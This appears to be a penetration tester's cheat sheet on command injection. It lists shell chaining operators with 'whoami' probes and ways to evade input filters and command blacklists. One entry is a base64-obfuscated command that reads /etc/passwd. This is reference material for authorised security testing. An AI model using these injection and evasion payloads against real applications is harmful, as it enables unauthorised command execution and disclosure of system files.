# Command Injection Testing

<table><thead><tr><th width="201">Parameter</th><th>Objective</th></tr></thead><tbody><tr><td><code>-h</code> or <code>/?</code></td><td>What is the system output from using help menu commands?</td></tr><tr><td><code>;</code>,<br><code>; echo whoami</code></td><td>Unix only; run echo after initial command</td></tr><tr><td><code>|</code>,<br><code>echo whoami|</code></td><td>Perl-specific injection to open files</td></tr><tr><td><p><code>||</code>,</p><p><code>|| echo whoami</code></p></td><td>Run command if the initial command returns non-zero as the exit status</td></tr><tr><td><code>&#x26;</code> ,<br><code>&#x26; echo whoami</code></td><td>Run initial command as background task and run next task immediately</td></tr><tr><td><code>&#x26;&#x26;</code> ,<br><code>&#x26;&#x26; echo whoami</code></td><td>Run if the initial command returns zero as the exit status</td></tr><tr><td><code>$(whoami)</code></td><td>Unix-only; Bash command execution</td></tr><tr><td><code>`whoami`</code></td><td>Unix only; using generic process substitution</td></tr><tr><td><code>>(whoami)</code></td><td>Unix only; using process substitution</td></tr></tbody></table>

## Identifying Blacklisted Characters

Check in Burp with each Command Injection operators.

#### Bypassing Space Filters

```bash
# Add TAB
%09

# Add SPACE
${IFS}

# Add Brace Expresions
{ls,-al}
```

#### Bypassing Other Blacklisted Characters (Linux)

```bash
# Add /
${PATH:0:1}

# Add ;
${LS_COLORS:10:1}

# Character Shifting
man ascii (Find \) = 92 
$(tr '!-}' '"-~'<<<[)
```

#### Bypassing Other Blacklisted Characters (Windows)

```powershell
# Add \
%HOMEPATH:~6,-11%
$env:HOMEPATH[0]
```

#### Bypassing Blacklisted Commands (Linux)

```bash
w'h'o'am'i
w"h"o"am"i
who$@ami
w\ho\am\i
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
$(a="WhOaMi";printf %s "${a,,}")
$(rev<<<'imaohw')
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
```